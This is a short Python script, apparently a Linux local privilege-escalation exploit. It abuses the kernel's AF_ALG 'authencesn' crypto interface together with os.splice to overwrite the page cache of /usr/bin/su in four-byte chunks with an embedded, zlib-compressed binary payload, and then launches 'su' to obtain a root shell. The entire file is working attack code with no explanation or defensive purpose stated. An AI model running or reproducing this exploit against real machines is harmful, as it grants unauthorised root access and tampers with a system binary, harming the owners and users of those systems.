import os, zlib, socket
 
 
def exploit(payload, su_file, counter):
 
    listener = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET)
    listener.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
 
    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, bytes.fromhex('0800010000000010'+'0'*64))
    listener.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE, None, 4)
 
    connection, _ = listener.accept()
 
    connection.sendmsg([b"A"*4+payload], [(socket.SOL_ALG, 3, b'\x00'*4), (socket.SOL_ALG, 2, b'\x10'+b'\x00'*19), (socket.SOL_ALG, 4, b'\x08' + b'\x00' * 3),], 32768)
 
    stdin, stdout = os.pipe()
 
    os.splice(su_file, stdout, counter + 4, offset_src=0)
    os.splice(stdin, connection.fileno(), counter + 4)
 
    try:
        connection.recv(8 + counter)
    except:
        0
 
if __name__ == "__main__":
 
    payload = zlib.decompress(bytes.fromhex("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
 
    su_file = os.open("/usr/bin/su", 0)
 
    i = 0
 
    while i < len(payload):
        exploit(payload[i:i+4], su_file, i)
        i += 4
 
    os.system("su")